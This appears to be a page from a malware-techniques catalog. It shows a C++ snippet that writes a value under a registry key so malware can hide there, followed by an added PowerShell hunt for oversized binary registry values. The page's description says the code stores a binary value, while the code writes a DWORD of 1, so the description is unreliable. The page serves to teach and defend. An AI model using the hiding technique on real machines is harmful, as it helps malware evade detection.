(C++) Hiding Mechanisms by Thomas Roccia

Created on Tuesday 13 December 2022. Updated 1 year, 4 months ago.

Description:

The code uses the Windows API to open a registry key and create a new value within that key. The value is set to a binary data type, which could be used to store the malware itself. This code would need to be compiled and executed on a system to hide the malware in the registry.

Code

#include <Windows.h>
#include <stdio.h>

int main()
{
  // Open the registry key where the malware will be hidden.
  // The explicit ANSI variants are used so the narrow string literals
  // compile whether or not UNICODE is defined for the project.
  HKEY hKey;
  LONG status = RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SOFTWARE\\MyMalware", 0, KEY_WRITE, &hKey);
  if (status != ERROR_SUCCESS)
  {
    // The key must already exist; opening also needs write access to HKLM
    printf("RegOpenKeyExA failed: %ld\n", status);
    return 1;
  }

  // Create a new value in the registry key to store the malware
  DWORD dwValue = 1;
  status = RegSetValueExA(hKey, "HiddenValue", 0, REG_DWORD, (const BYTE *)&dwValue, sizeof(dwValue));
  if (status != ERROR_SUCCESS)
  {
    printf("RegSetValueExA failed: %ld\n", status);
  }

  // Close the registry key
  RegCloseKey(hKey);

  // Return success only if the value was written
  return (status == ERROR_SUCCESS) ? 0 : 1;
}
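A defender-side counterpart, added here as an example and not part of the original page or Thomas Roccia's code: a PowerShell hunt that walks the SOFTWARE hives and lists REG_BINARY values large enough to hold a stored payload, flagging any that start with an MZ header. The hive paths and the 4 KB threshold are assumptions chosen as a starting point.

```powershell
# Added example: hunt for oversized binary registry values, which is where a
# payload hidden with the RegSetValueEx technique above would end up.
# Assumptions: the hives to scan and the 4 KB minimum size are arbitrary defaults.
function Find-LargeBinaryRegistryValues {
    param(
        [string[]] $Roots = @('HKLM:\SOFTWARE', 'HKCU:\SOFTWARE'),
        [int] $MinBytes = 4096
    )

    foreach ($root in $Roots) {
        # SilentlyContinue skips keys the current account is not allowed to read
        Get-ChildItem -Path $root -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
            $key = $_   # Microsoft.Win32.RegistryKey from the Registry provider
            foreach ($name in $key.GetValueNames()) {
                # Only REG_BINARY values are of interest; REG_DWORD etc. cannot hold a payload
                if ($key.GetValueKind($name) -ne [Microsoft.Win32.RegistryValueKind]::Binary) { continue }
                $data = $key.GetValue($name)   # byte[]
                if ($data.Length -lt $MinBytes) { continue }

                $displayName = if ($name) { $name } else { '(Default)' }
                # An MZ header at offset 0 suggests a PE image was stored verbatim
                $looksLikePE = ($data.Length -ge 2 -and $data[0] -eq 0x4D -and $data[1] -eq 0x5A)

                [pscustomobject]@{
                    Key         = $key.Name
                    ValueName   = $displayName
                    Bytes       = $data.Length
                    LooksLikePE = $looksLikePE
                }
            }
        }
    }
}

# Run with the default hives and threshold, largest values first
Find-LargeBinaryRegistryValues |
    Sort-Object Bytes -Descending |
    Format-Table -AutoSize
```

Run it from an elevated prompt to cover HKLM fully; unreadable keys are skipped rather than reported, so a non-elevated run only covers what the current account can see.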